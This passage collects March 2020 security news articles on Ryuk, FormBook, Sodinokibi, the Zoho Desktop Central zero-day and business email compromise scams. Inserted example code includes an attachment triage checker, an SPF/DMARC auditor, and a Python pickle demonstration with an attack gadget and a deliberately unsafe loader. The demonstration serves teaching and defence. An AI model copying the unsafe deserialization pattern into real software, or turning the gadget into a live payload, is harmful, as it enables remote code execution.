To prevent the attack from spreading throughout their network, the City of Durham has "temporarily disabled all access into the DCI Network for the Durham Police Department, the Durham Sheriff’s Office and their communications center".

This has caused the city's 911 call center to shut down and for the Durham Fire Department to lose phone service. 911 calls, though, are being answered.

While they have not seen signs that data has been stolen, the city has warned that users should be on the lookout for phishing emails pretending to be from the City of Durham.

Actors were probably present on the network for weeks
The Ryuk Ransomware attacks are usually the result of a network becoming infected with the TrickBot Trojan first, which is usually installed through malicious attachments in phishing emails.

TrickBot is an information-stealing Trojan that will steal data from an infected computer and then attempt to spread laterally through the network.

After harvesting all valuable data from a network, it then proceeds to open a shell back to the Ryuk Ransomware actors who will then proceed to harvest data from the network as well and gain administrator credentials.

When done, they deploy the Ryuk Ransomware on all devices on the network to generate a large ransom, which can range from $10,000 on very small networks to millions of dollars on larger networks.

In December 2019, the Ryuk Ransomware was behind the attack on New Orleans and just recently attacked legal services giant Epiq Global, which caused them to take all of their systems offline as well to contain the infection.


Google Stops Issuing Security Warnings About Microsoft Edge
14.3.2020 
Bleepingcomputer  Security

Google has toned down its rhetoric by no longer displaying a security warning on its extension store to Microsoft Edge users that tells them to switch to Chrome to be more secure.

As the new Microsoft Edge is based on Chromium, browser extensions designed for Google Chrome are also compatible with Microsoft's new Edge browser.

Starting last month, Microsoft Edge users visiting the Chrome Web Store were greeted with a yellow alert stating that they should switch to Chrome to "use extensions securely".

Google warning to Microsoft Edge Users
As Microsoft Edge and Google Chrome run extensions in the same manner, this looked to many like Google was just taking shots at Microsoft's new browser out of fear of losing market share.

Google, though, told BleepingComputer that they are displaying this alert because Microsoft Edge does not support Google's Safe Browsing Feature.

As the Chrome team uses this feature to pull malicious extensions, Microsoft Edge users would not benefit from this protection and would continue to use a malicious extension after Google had pulled it.

While true, their alert could have been worded better to indicate the lack of this protection rather than implying that Microsoft Edge is less secure.

Google apparently realized that the alert was not making it look good, as it is no longer being displayed to Microsoft Edge users.


New US Bill Aims to Protect Researchers who Disclose Govt Backdoors
14.3.2020 
Bleepingcomputer  BigBrothers  Virus

New legislation has been introduced that amends the Espionage Act of 1917 to protect journalists, whistleblowers, and security researchers who discover and disclose classified government information, so that the act can no longer be used to target them for publishing government secrets.

Concerned that the current laws are being used for partisan prosecution, U.S. Representative Ro Khanna (D - California) introduced the new legislation to Congress on March 5th, 2020 and U.S. Senator Ron Wyden (D - Oregon) will soon introduce it to the Senate.

"My bill with Senator Wyden will protect journalists from being prosecuted under the Espionage Act and make it easier for members of Congress, as well as federal agencies, to conduct proper oversight over any privacy abuses. Our nation’s strength rests on the freedom of the press, transparency, and a functioning system of checks and balances. This bill is a step toward ensuring those same principles apply to intelligence gathering and surveillance operations," said Rep. Ro Khanna.

"This bill ensures only personnel with security clearances can be prosecuted for improperly revealing classified information," Senator Wyden stated.

This new legislation titled 'Espionage Act Reform Act of 2020’ ensures:

Journalists who solicit, obtain, or publish government secrets are safe from prosecution.
Every member of Congress is equally able to receive classified information, specifically from whistleblowers. Current law criminalizes the disclosure of classified information related to signals intelligence to any member of Congress, unless it is in response to a “lawful demand” from a committee. This change puts members in the minority party and those not chairing any committee at a significant disadvantage toward conducting effective oversight.
Federal courts, inspector generals, the FCC, Federal Trade Commission, and Privacy & Civil Liberties Oversight Board can conduct oversight into privacy abuses.
Cybersecurity experts who discover classified government backdoors in encryption algorithms and communications apps used by the public can publish their research without the risk of criminal penalties. The bill correctly places the burden on governments to hide their surveillance backdoors; academic researchers and other experts should not face legal risks for discovering them.
With these new amendments, security researchers are also protected from revealing classified government surveillance backdoors that have been added to encryption algorithms and communications apps that are utilized by the public.

Hacking into government systems or unlawfully obtaining nonpublic government information, though, is still off-limits and would lead to prosecution.

With these changes, researchers would be able to analyze government mobile apps, communication protocols, and algorithms and disclose any vulnerabilities and backdoors without fear of prosecution.

The current legislation can be found in chapter 37 of title 18, United States Code and the proposed amendments can be read here.

Senator Wyden has also released a summary of the bill/FAQ that provides an overview as to why the legislation is being introduced and answers some commonly asked questions.


How to Use Google Chrome Extensions and Themes in Microsoft Edge
7.3.2020 
Bleepingcomputer  Security

Microsoft's new Edge browser is now available and it comes with an add-on store where you can find Microsoft-approved extensions. As Edge is built on the same Chromium code base, it can also access the Chrome Web Store.

In addition to Microsoft's selection of extensions, you can also install the large selection of Chrome extensions in Edge. Like extensions, Chrome themes are also getting support in Edge, and you can try them in the Canary builds of the browser.

In this article, we're going to walk you through the steps to download and install Chrome extensions and themes in Edge.

Add Chrome extensions to Microsoft Edge
To install Chrome extensions in Edge, follow these steps:

Open Edge (Stable, Beta, Dev or Canary) and click the three-dots icon to open its menu.
From the Edge menu, select “Extensions”.
In Edge's Extensions tab, turn on the option “Allow extensions from other stores”.
Chrome extensions

You'll need to click Allow in a pop-up window to confirm that you want to install Chrome extensions in your Edge browser.
Now you can visit the Chrome store and install any extension that you want.

Add Chrome themes to Microsoft Edge
In Edge Canary, you can also install Chrome themes after enabling an experimental flag feature:

In Edge's address bar, type Edge://flags
Edge

Now search for 'Allow installation of external store themes' and locate the flag with this name.
Enable the flag and relaunch the browser.
You can now head to the Chrome store and install themes.

Any installed theme can be removed by going to Edge settings > Appearance > Custom theme.


Data-Stealing FormBook Malware Preys on Coronavirus Fears
7.3.2020 
Bleepingcomputer  Spam

Another email campaign pretending to be Coronavirus (COVID-19) information from the World Health Organization (WHO) is distributing a malware downloader that installs the FormBook information-stealing Trojan.

With the fears of Coronavirus in full swing, malware distributors are preying on these fears by sending emails that pretend to be the latest updates on the Coronavirus disease outbreak.

These emails contain a ZIP file attachment and state that they come from the 'World Health Organization' with information about the latest "Coronavirus Updates". When viewed in a mail client, they do not display very well, as seen below.

Coronavirus Spam
The emails will, though, prompt you to view the email in a browser, which properly displays the content of the email.

This content pretends to be the latest updates on the Coronavirus outbreak and lists various stats, contains an email address, corona-virus@caramail.com, that is used for further phishing, and prompts you to view the attached 'MY-HEALTH.PDF' file for 'the simplest and fastest ways to take of your health and protect others'.

Viewing email in a browser
This ZIP file attachment contains an executable called MyHealth.exe, which the malware distributors are trying to pass off as the MyHealth.PDF file they mention in the email. They are not, though, doing a convincing job as they use a generic executable icon.

Mail Attachment
According to MalwareHunterTeam who discovered this spam campaign, the executable is GuLoader, which is a malware downloader.

Once executed, GuLoader will download an encrypted file from https://drive.google.com, decrypt it, and then inject the malware into the legitimate Windows wininit.exe process to evade detection.

The downloaded malware is the FormBook information-stealing Trojan, which FireEye states will attempt to steal the contents of the Windows clipboard, log what you type into the keyboard, and steal data while you are browsing the web.

"The malware injects itself into various processes and installs function hooks to log keystrokes, steal clipboard contents, and extract data from HTTP sessions. The malware can also execute commands from a command and control (C2) server. The commands include instructing the malware to download and execute files, start processes, shutdown and reboot the system, and steal cookies and local passwords."

Using this malware, attackers can steal banking credentials, web site login credentials, cookies that allow them to logon to sites as the victim, and the contents of the Windows clipboard.

This means that those infected with this malware face a significant risk of identity theft, online banking theft, and the compromise of other accounts they normally log into.

If you have recently received an email claiming to be from the WHO about Coronavirus and it contains an attachment that you opened, it is strongly advised that you scan your computer with antivirus software as soon as possible.
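As an added example (not code from the original article or from MalwareHunterTeam), the check below triages a ZIP attachment the way a mail gateway might, flagging the mismatch described above: a member with an executable extension, a double extension such as .pdf.scr, or a file whose bytes start with the PE "MZ" header while its name claims to be a document. The sample ZIP is constructed in memory with placeholder bytes, not the real MyHealth.exe.

```python
"""Triage a ZIP e-mail attachment for executables disguised as documents.

Added example: the sample archive is constructed below with placeholder
bytes; nothing here is the real MyHealth.exe from the campaign.
"""
import io
import zipfile
from typing import List

PE_MAGIC = b"MZ"          # DOS/PE header every Windows executable starts with
PDF_MAGIC = b"%PDF"       # a genuine PDF starts with this
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs", ".ps1", ".dll"}
DOCUMENT_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt"}


def triage_member(name: str, head: bytes) -> List[str]:
    """Return findings for one archive member given its name and first bytes."""
    findings = []
    base = name.lower().rsplit("/", 1)[-1]
    exts = ["." + p for p in base.split(".")[1:]]
    last = exts[-1] if exts else ""
    if last in EXECUTABLE_EXTS:
        findings.append(f"{name}: executable extension {last} inside attachment")
    if len(exts) >= 2 and exts[-2] in DOCUMENT_EXTS and last in EXECUTABLE_EXTS:
        findings.append(f"{name}: double extension {''.join(exts[-2:])}")
    if head.startswith(PE_MAGIC):
        findings.append(f"{name}: PE header (MZ) regardless of extension")
        if last in DOCUMENT_EXTS:
            findings.append(f"{name}: claims {last} but is a PE executable")
    elif last == ".pdf" and not head.startswith(PDF_MAGIC):
        findings.append(f"{name}: .pdf without %PDF header")
    return findings


def triage_zip(data: bytes) -> List[str]:
    """Scan every file in a ZIP; only the first 8 bytes of each member are read."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                head = fh.read(8)
            findings.extend(triage_member(info.filename, head))
    return findings


def build_sample_zip() -> bytes:
    """Constructed sample: placeholder 'MZ' stubs, not working programs."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("MyHealth.exe", PE_MAGIC + b"\x00" * 62)      # as in the campaign
        zf.writestr("invoice.pdf", PE_MAGIC + b"\x00" * 62)       # PE hiding behind .pdf
        zf.writestr("readme.pdf.scr", PE_MAGIC + b"\x90\x00")     # double extension
        zf.writestr("real.pdf", b"%PDF-1.4\n%placeholder\n")      # benign control
    return buf.getvalue()


if __name__ == "__main__":
    for finding in triage_zip(build_sample_zip()):
        print(finding)
```

Reading only the first bytes of each member keeps the check cheap even for large archives, and checking magic bytes rather than the extension alone is what catches the "PDF" that is really a PE file.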

Protecting yourself from Coronavirus scams
When receiving emails, you should never open any attachments unless you confirm the sender.

This means that you should call the sender to confirm that they sent the email, or at least discuss the attachment with your network administrator to determine whether it is safe.

The World Health Organization has also issued an alert to be on the lookout for criminals trying to impersonate them and that they will:

never ask you to login to view safety information
never email attachments you didn’t ask for
never ask you to visit a link outside of www.who.int
never charge money to apply for a job, register for a conference, or reserve a hotel
never conduct lotteries or offer prizes, grants, certificates or funding through email
never ask you to donate directly to emergency response plans or funding appeals.
If you receive an email claiming to be from the WHO and it has an attachment, simply mark it as spam and delete it.


Ransomware Threatens to Reveal Company's 'Dirty' Secrets
7.3.2020 
Bleepingcomputer  Ransomware

The operators of the Sodinokibi Ransomware are threatening to publicly share a company's "dirty" financial secrets because they refused to pay the demanded ransom.

As organizations decide to restore their data manually or via backups instead of paying ransoms, ransomware operators are escalating their attacks.

In a new post by the Sodinokibi operators to their data leak site, we can see that attackers are not only publishing victim's data but also sifting through it to find damaging information that can be used against the victim.

Entry on Ransomware data leak site
In the above post, the attackers are threatening to sell the Social Security Numbers and dates of birth of people in the data to other hackers on the dark web.

They also intimate that they found "dirty" financial secrets in the data and threaten to disclose it.

"It is only a small part of your data and it’s in picture for now. Every day more and more information will be uploaded.
SSN + DOB + other information about people - will be sold in DarkWeb to people who will use them for their probably “dark deals”.
After revealing people’s personal data, they will be informed who is guilty in publications.
There is also other interesting information. Your financial reports are very interesting and “dirty” - these secrets will be revealed a little later to certain people."

These new extortion attempts further illustrate how victims need to treat ransomware attacks very seriously.

It is no longer only about getting your data back, but also the risk of very private and personal data being exposed and sold to other attackers.

This puts at risk not only the companies that were attacked but also their employees, whose data is disclosed.

Companies should avoid paying a ransom where they can, but even when data is published they should disclose these attacks as data breaches so that affected employees can protect themselves.

BleepingComputer has contacted the company for a public statement but has not heard back as of yet.


Zoho Fixes No-Auth RCE Zero-Day in ManageEngine Desktop Central
7.3.2020 
Bleepingcomputer  Vulnerebility

Web-based office suite and SaaS services provider Zoho released a security update to fix a remote code execution vulnerability found in its ManageEngine Desktop Central endpoint management solution that does not require authentication to be exploited.

Desktop Central helps organizations such as managed service providers (MSPs) manage devices such as servers, laptops, desktops, smartphones, and tablets from a central location, and automate frequent endpoint management routines like patch installation, OS imaging, and remote control of endpoints.

Zoho patches zero-day impacting thousands of servers
The security flaw caused by deserialization of untrusted data in getChartImage in the FileStorage class, now tracked as CVE-2020-10189, impacts Desktop Central build 10.0.473 and below, and it was fixed by Zoho with the release of build 10.0.479.

Customers using Desktop Central build 10.0.474 and above are also not vulnerable, according to Zoho, because a short-term fix for the no-auth arbitrary file upload flaw was included in build 10.0.474, released on January 20, 2020.

At the moment, over 2,300 ManageEngine Desktop Central servers can be reached over the Internet according to a Shodan scan shared by Microsoft Security Response Center security researcher Nate Warfield.

Seeing that exploiting CVE-2020-10189 allows threat actors to execute arbitrary code as SYSTEM/root on unpatched systems, future attacks targeting vulnerable servers could lead to dangerous malware being deployed on networks of companies that haven't yet patched their Desktop Central installations.

https://t.co/cCOrj1t6bo - "only" 2300+ of these online.....

— Nate Warfield (@n0x08) March 5, 2020
Vulnerability disclosed on Twitter without notification
Source Incite security researcher Steven Seeley publicly disclosed the zero-day vulnerability on Twitter on March 5, saying that he decided to do this because Zoho "typically ignores researchers."

"The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data," Seeley's security advisory explains. "An attacker can leverage this vulnerability to execute code under the context of SYSTEM."

The researcher also released a proof of concept showing how potential attackers could exploit the vulnerability on unpatched systems running Zoho's Unified Endpoint Management (UEM).
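The vulnerability class Seeley describes, deserialization of untrusted data, is language-independent. The added example below (written for this page, not Zoho's Java code and not Seeley's exploit) shows it with Python's pickle: a crafted object makes the deserializer call a function of the attacker's choosing while loading, whereas a restricted unpickler that only permits an allow-list of types refuses the same payload. The function names, the harmless side_effect stand-in for code execution, and the build-number helper that encodes the versions given in this article are all assumptions made for the example.

```python
"""Deserialization of untrusted data, shown with Python's pickle.

Added example, not Zoho's code: pickle plays the role of the Java
deserializer, and side_effect() stands in for attacker code execution.
"""
import io
import pickle
from typing import Any, Tuple

EXECUTED = []  # records every side effect that a deserialization triggered


def side_effect(tag: str) -> str:
    EXECUTED.append(tag)
    return tag


class Gadget:
    """Attacker-controlled object: __reduce__ makes pickle call side_effect()."""

    def __reduce__(self):
        return (side_effect, ("pwned",))


def attacker_payload() -> bytes:
    return pickle.dumps(Gadget())


def benign_payload() -> bytes:
    return pickle.dumps({"host": "dc01", "build": 473})


def unsafe_load(blob: bytes) -> Any:
    """Vulnerable pattern: user-supplied bytes go straight to the deserializer."""
    return pickle.loads(blob)


class RestrictedUnpickler(pickle.Unpickler):
    """Hardened pattern: refuse any global not on a short allow-list."""
    ALLOWED = {("builtins", "dict"), ("builtins", "list"), ("builtins", "str"), ("builtins", "int")}

    def find_class(self, module: str, name: str):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"forbidden global {module}.{name}")


def safe_load(blob: bytes) -> Any:
    return RestrictedUnpickler(io.BytesIO(blob)).load()


def safe_load_rejects(blob: bytes) -> bool:
    """True when the restricted loader refuses the blob (nothing is executed)."""
    try:
        safe_load(blob)
    except pickle.UnpicklingError:
        return True
    return False


def parse_build(build: str) -> Tuple[int, ...]:
    return tuple(int(x) for x in build.split("."))


def desktop_central_vulnerable(build: str) -> bool:
    """Per the article: 10.0.473 and below are affected; 10.0.474 carried a
    short-term fix and 10.0.479 the full fix (assumes dotted numeric builds)."""
    return parse_build(build) <= parse_build("10.0.473")


if __name__ == "__main__":
    print(unsafe_load(attacker_payload()), EXECUTED)   # pwned ['pwned']
    print(safe_load_rejects(attacker_payload()))         # True
    print(safe_load(benign_payload()))                   # {'host': 'dc01', 'build': 473}
    print(desktop_central_vulnerable("10.0.473"))        # True
```

The point of the hardened loader is that it never reaches the attacker's callable: the refusal happens in find_class before any object is constructed. The real fix for a Java deserializer is the same idea (an ObjectInputFilter or equivalent allow-list), or not accepting serialized objects from unauthenticated callers at all.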

Since @zoho typically ignores researchers, I figured it was OK to share a ManageEngine Desktop Central zero-day exploit with everyone. UnCVE'ed, unpatched and unauthenticated RCE as SYSTEM/root. Enjoy!

Advisory: https://t.co/U9LZPp4l5o
Exploit: https://t.co/LtR75bhooy

— (@steventseeley) March 5, 2020


US Govt Shares Tips to Defend Against Coronavirus Cyber Scams
7.3.2020 
Bleepingcomputer BigBrothers

The Department of Homeland Security's cybersecurity agency today shared tips on how to defend against scammers who use the coronavirus health crisis as bait to push their scams over the Internet.

The Cybersecurity and Infrastructure Security Agency (CISA) warned individuals across the U.S. to remain vigilant for cyber scams related to the Coronavirus Disease 2019 (COVID-19) and to take a number of precautions to make sure that they won't be the victims of cybercriminals.

Defense measures against Coronavirus cyber scams
"Cyber actors may send emails with malicious attachments or links to fraudulent websites to trick victims into revealing sensitive information or donating to fraudulent charities or causes," CISA said.

"Exercise caution in handling any email with a COVID-19-related subject line, attachment, or hyperlink, and be wary of social media pleas, texts, or calls related to COVID-19."

Individuals are encouraged by the cybersecurity agency to:

• Avoid clicking on links in unsolicited emails and be wary of email attachments. See Using Caution with Email Attachments and Avoiding Social Engineering and Phishing Scams for more information.
• Use trusted sources—such as legitimate, government websites—for up-to-date, fact-based information about COVID-19.
• Do not reveal personal or financial information in email, and do not respond to email solicitations for this information.
• Verify a charity’s authenticity before making donations. Review the Federal Trade Commission’s page on Charity Scams for more information.
• Review CISA Insights on Risk Management for COVID-19 for more information.
Coronavirus-themed phishing, scams, and malware
This warning comes after previous ones issued last month by the World Health Organization (WHO) and the U.S. Federal Trade Commission (FTC) about ongoing Coronavirus-themed phishing attacks and scam campaigns.

COVID-19 is a highly popular phishing bait for targeting individuals from the United States and the United Kingdom as researchers at IBM X-Force Threat Intelligence, KnowBe4, and Mimecast found in February.

A report from Imperva also highlights how "high levels of concern around the Coronavirus are currently being used to increase the online popularity of spam campaigns designed to spread fake news and drive unsuspecting users to dubious online drug stores."

Coronavirus-themed malware has also been found by security researchers since January, with the security research collective MalwareHunterTeam having previously shared malware samples with Coronavirus references, including a Remote Access Trojan (RAT), a Trojan, a stealer/keylogger, and a wiper.

Microsoft, Google, LogMeIn, and Cisco have also announced this week that they are offering free licenses for meeting, collaboration, and remote work tools so that remote workers can join virtual meetings and chat with their colleagues while working remotely from their homes.


FBI Warns of BEC Attacks Abusing Microsoft Office 365, Google G Suite
7.3.2020 
Bleepingcomputer BigBrothers

The US Federal Bureau of Investigation (FBI) warned private industry partners of threat actors abusing Microsoft Office 365 and Google G Suite as part of Business Email Compromise (BEC) attacks.

"The scams are initiated through specifically developed phish kits designed to mimic the cloud-based email services in order to compromise business email accounts and request or misdirect transfers of funds," the FBI said in a Private Industry Notification (PIN) from March 3.

"Between January 2014 and October 2019, the Internet Crime Complaint Center (IC3) received complaints totaling over $2.1 billion in actual losses from BEC scams targeting Microsoft Office 365 and Google G Suite."

BEC scammers in the cloud
The cybercriminals' move to cloud-based email services matches organizations' own migration from on-premises email systems to the same services.

Targets are redirected to the phishing kits used as part of these BEC attacks via large scale phishing campaigns, with the phishing kits being email service-aware and capable of detecting the "service associated with each set of compromised credentials."

"Upon compromising victim email accounts, cybercriminals analyze the content to look for evidence of financial transactions," the FBI explains.

"Using the information gathered from compromised accounts, cybercriminals impersonate email communications between compromised businesses and third parties, such as vendors or customers."

The scammers will then impersonate employees of the now-compromised organizations or their business partners, attempting to redirect payments between them to bank accounts under the attackers' control.

They also harvest as many partner contacts as they can from the infiltrated email accounts, later using them to launch further phishing attacks and compromise other businesses, pivoting to other targets within the same industry sector.

FBI Microsoft Office 365 and Google G Suite BEC PIN

BEC defense recommendations
Even though both Microsoft Office 365 and Google G Suite come with security features that can help block BEC scam attempts, many of them have to be manually configured and toggled on by IT administrators and security teams.

Because of this, "small and medium-size organizations, or those with limited IT resources, are most vulnerable to BEC scams," the FBI added.

The FBI issued a number of defense recommendations IT admins can implement on their networks to prevent BEC attacks:

• Prohibit automatic forwarding of email to external addresses.
• Add an email banner to messages coming from outside your organization.
• Prohibit legacy email protocols such as POP, IMAP, and SMTP that can be used to circumvent multi-factor authentication.
• Ensure mailbox logon and settings changes are logged and retained for at least 90 days.
• Enable alerts for suspicious activity such as foreign logins.
• Enable security features that block malicious email such as anti-phishing and anti-spoofing policies.
• Configure Sender Policy Framework (SPF), DomainKeys Identified Mail (DKIM), and Domain-based Message Authentication Reporting and Conformance (DMARC) to prevent spoofing and to validate email.
• Disable legacy account authentication.
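One of the recommendations above, SPF, DKIM and DMARC, is often deployed in a monitoring-only state that stops nothing. The added example below (not from the FBI notification) audits SPF and DMARC TXT records for the weak settings an admin should look for, with a constructed weak record beside a hardened one; the include host is the standard Office 365 SPF include, and the mailbox in the rua= tag is a placeholder.

```python
"""Audit SPF and DMARC TXT records for settings that leave spoofing possible.

Added example, not from the FBI notification. The records below are
constructed: the include host is the standard Office 365 SPF include,
the rua= mailbox is a placeholder.
"""
import re
from typing import Dict, List

WEAK_SPF = "v=spf1 include:spf.protection.outlook.com ?all"
HARDENED_SPF = "v=spf1 include:spf.protection.outlook.com -all"
WEAK_DMARC = "v=DMARC1; p=none"
HARDENED_DMARC = "v=DMARC1; p=reject; rua=mailto:dmarc@example.com; adkim=s; aspf=s"

# SPF mechanisms/modifiers that each cost one of the 10 permitted DNS lookups.
LOOKUP_TERM = re.compile(r"^[+\-~?]?(include:|a$|a:|mx$|mx:|ptr|exists:|redirect=)")


def audit_spf(record: str) -> List[str]:
    findings = []
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        return ["SPF: record missing or not v=spf1"]
    last = terms[-1].lower()
    if last in ("+all", "all"):
        findings.append("SPF: '+all' authorises every sender, the record is useless")
    elif last == "?all":
        findings.append("SPF: '?all' is neutral, receivers treat it like no policy")
    elif last not in ("-all", "~all") and not last.startswith("redirect="):
        findings.append("SPF: no terminating 'all' mechanism")
    lookups = sum(1 for t in terms[1:] if LOOKUP_TERM.match(t.lower()))
    if lookups > 10:
        findings.append(f"SPF: {lookups} lookup terms exceed the limit of 10 (permerror)")
    return findings


def parse_tags(record: str) -> Dict[str, str]:
    """Split 'k=v; k=v' into a dict; keys are lowercased, values kept as-is."""
    tags = {}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.strip().split("=", 1)
            tags[key.strip().lower()] = value.strip()
    return tags


def audit_dmarc(record: str) -> List[str]:
    tags = parse_tags(record)
    if tags.get("v") != "DMARC1":
        return ["DMARC: record missing or not v=DMARC1"]
    findings = []
    policy = tags.get("p", "")
    if policy == "none":
        findings.append("DMARC: p=none only monitors, spoofed mail is still delivered")
    elif policy not in ("quarantine", "reject"):
        findings.append("DMARC: missing or invalid p= tag")
    pct = tags.get("pct", "100")
    if pct.isdigit() and int(pct) < 100:
        findings.append(f"DMARC: pct={pct} leaves {100 - int(pct)}% of failing mail unenforced")
    if "rua" not in tags:
        findings.append("DMARC: no rua= address, aggregate reports are not collected")
    if tags.get("sp") == "none":
        findings.append("DMARC: sp=none leaves subdomains unprotected")
    return findings


if __name__ == "__main__":
    for label, rec in (("weak SPF", WEAK_SPF), ("hardened SPF", HARDENED_SPF)):
        print(label, audit_spf(rec))
    for label, rec in (("weak DMARC", WEAK_DMARC), ("hardened DMARC", HARDENED_DMARC)):
        print(label, audit_dmarc(rec))
```

In practice the records come from a DNS TXT lookup of the domain and of _dmarc.<domain>; the audit functions take the record text so they can be run against the exported zone files of many tenants at once. DKIM is not audited here because its keys live under selector names that cannot be enumerated from the zone apex.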
End users can also take these measures to defend against BEC scammers:

• Enable multi-factor authentication for all email accounts.
• Verify all payment changes and transactions in-person or via a known telephone number.
• Educate employees about BEC scams, including preventative strategies such as how to identify phishing emails and how to respond to suspected compromises.
The $26 billion scam
The FBI's Internet Crime Complaint Center (IC3) revealed in the 2019 Internet Crime Report published last month that cybercrime was behind individual and business losses of $1.8 billion during the last year alone.

The IC3 also issued a Public Service Announcement (PSA) in September 2019 warning that BEC scams are continuing to grow every year, with victim complaints with a total exposed dollar loss of more than $26 billion between June 2016 and July 2019, and a 100% rise in the identified global exposed losses from May 2018 to July 2019.

Even though quite hard to believe, these numbers are backed by the publicly reported losses with a Toyota Group subsidiary announcing in September 2019 that it was the victim of a BEC scam with an expected financial loss of over $37 million.

Another BEC attack hit Nikkei, one of the largest media groups in the world, costing the company around $29 million in October 2019.

Also in October 2019, 281 people were arrested in the U.S. and other countries as part of Operation reWired, a globally coordinated law enforcement effort to disrupt Business Email Compromise (BEC) schemes.

A previous and similar effort dubbed Operation Wire Wire, announced in June 2018, was the first such enforcement action designed to go after hundreds of BEC scammers, and it led to the arrest of 74 individuals, as well as the disruption and recovery of roughly $14 million in fraudulent wire transfers.

The FBI recommends BEC scam victims to file a complaint regardless of the amount they lost at BEC.IC3.gov.


Telus-Owned Koodo Mobile Announces Data Breach, Stolen Info for Sale
7.3.2020 
Bleepingcomputer Incindent

Telus-owned Koodo Mobile has suffered a data breach after their systems were hacked and customer data from August and September 2017 was stolen by the attackers.

According to a data breach notification email from Koodo Mobile that was seen by BleepingComputer, their systems were hacked on February 13th, 2020, and an unauthorized person stole customer data from August and September 2017 that contains mobile account numbers and telephone numbers.

"What happened: On February 13, 2020, an unauthorized third party using compromised credentials accessed our systems and copied August/September 2017 data that included your mobility account number and telephone number. It is possible that the information exposed has changed since 2017, in which case your current information is not compromised," the email stated.

This information can be used by scammers to port Koodo Mobile numbers to attacker's devices to receive 2-factor authentication codes, which could allow attackers to gain access to email and bank accounts.

To prevent this, Koodo has enabled the 'Port Protection' feature on the affected accounts, which prevents attackers from porting a Koodo Mobile number to another carrier unless the account holder first calls and requests it to be done.

Koodo customer data being sold online
The email goes on to say that Koodo Mobile has found evidence that the stolen customer information is being sold online, but the company believes its Port Protection feature will prevent customers' mobile numbers from being used for fraudulent purposes.

"We have found evidence that the unauthorized third party is offering the information for sale on the dark web. With port protection in place, we do not believe that your information could be used for any fraudulent purposes. Nevertheless, we have reported this incident to Law Enforcement and the Office of the Privacy Commissioner of Canada and we are working closely with them on this matter," the Koodo notification warned.

They then contradict themselves later in the notification by saying that affected users should not use their mobile number for two-factor authentication due to this data breach.

"We also recommend that you not register your mobile telephone number on online accounts. If you have done so, you may want to remove it and use an alternative method to receive One Time Passcodes or 2 Factor Authentication codes," the email continues.

Raveed Laeb of cybersecurity intelligence firm KELA told BleepingComputer that Koodo accounts are being sold on various dark web sites.

"A different market - one that specializes in automated selling of access to compromised accounts - currently offers over 21,000 Koodo accounts," Laeb told BleepingComputer.

Koodo Accounts for sale
Source: KELA
"As can be seen in the image in the third from the right column, this market also indicates the date in which the account was uploaded. Breaking down accounts scraped from the market by date, we can see an uptick in February," Laeb explained.

Monthly amounts of Koodo accounts sold online
Source: KELA
Unfortunately, with the amount of information leaked by data breaches, it may be too easy for an attacker to find enough information online about a particular customer so that they can bypass the Port Protection feature.

Due to this, it is strongly advised that you use another 2FA method for securing online accounts.

Otherwise, you may run into a similar problem as the one reported by this Koodo customer in the past.

Tweet

Affected users should also be on the lookout for mobile SMS phishing (smishing) scams that pretend to be Koodo and utilize information obtained from this breach.

Update 3/7/20: Added information about Koodo accounts being sold online.


Windows 10 KB4535996 Update Issues: Crashes, Slowdowns, Audio, More
7.3.2020 
Bleepingcomputer OS

Since the release of the Windows 10 KB4535996 cumulative update, Windows users have been reporting numerous problems including boot issues, crashes, performance problems, audio issues, and developer tools no longer working.

The optional Windows 10 KB4535996 cumulative update was released on February 27th, 2020 and while it resolved some Windows Search issues, it also introduced other issues for users who installed the update.

Unfortunately, with Windows 10 installed on over 900 million PCs, a new update will always cause problems for some users, such as Windows not booting, screen flickering, Cortana breaking, or programs no longer launching.

For some, these issues can be resolved by updating to newer drivers or software installed on the computer.

Below are the most common issues Windows 10 users are encountering after installing the optional KB4535996 update released on February 27th.

Boot issues and hangs
On two machines on which BleepingComputer installed the KB4535996 update, there is a noticeable slowdown before the login screen is shown after restarting Windows 10.

Before the update, the booting of Windows 10 was quick and would go right into the lock screen. Now there is a few seconds delay during which Windows 10 shows a black screen before displaying the login prompt.

I am lucky, though, as others have reported worse issues [1, 2, 3] such as Windows 10 not starting at all after installing the update.

"On the initial download and install my PC hung at 100% for 5 - 10 mins. Afterwards it hung on the welcome screen after restarts. I recovered the PC by running startup recovery in WinRE, it removed the update. I tried again to install it with the same result. I ran sfc/scannow after both attempts, it found and repaired a few things."

Blue screen crashes at login
One enterprise user reported on the Microsoft forums that after installing the KB4535996 cumulative update almost 200 PCs in their organization would crash with blue screens at the login screen.

"Seeing this issue with about 200 machines. Uninstalling the update doesnt come off cleanly and still gets lock ups on initial boot. "

It should be noted that this may be an outlier or something related to software installed in their organization as I am not seeing many reports like this elsewhere.

Performance issues
One of our readers submitted a tip this week stating that after installing the KB4535996 update, their system has been having performance issues and once they uninstalled the update it worked properly again.

"March 2020 - Installed Microsoft cumulative update KB4535996 on Windows 10 Home 64 bit - caused severe machine slowdown, application and website loading delays. Uninstalled update and problem went away."

Others have also reported similar performance issues [1, 2, 3] where Windows 'stutters', frame rates in games have gone down, and reports of high disk usage or thrashing.

Sound and audio hardware issues
After installing the KB4535996 update, users are reporting [1, 2, 3] that the sound in Windows 10 no longer works.

One user stated that their problem was related to their Sound Blaster USB device no longer being detected by Windows 10.

"After this update my Sound Blaster USB Audio cards stopped working, They would not even show up in the Device Manager yet they were properly connected and worked prior to the update."

Microsoft Visual Studio signtool.exe stops working
Since KB4535996 was released, we have had numerous reports about the Visual Studio code-signing tool signtool.exe no longer working.

Signtool.exe is a program that allows you to digitally sign an executable with a code-signing certificate to indicate that the program comes from a specific publisher and has not been tampered with.

After installing KB4535996, users are reporting that when they use the tool it generates an error code -1073741502.

According to Windows developer Rafael Rivera, this bug is being caused by WTLogConfigCiScriptEvent being removed from wldp.dll.

Rafael Tweet

Microsoft has stated that they are aware of the issue and are working on a resolution for release in mid-March.

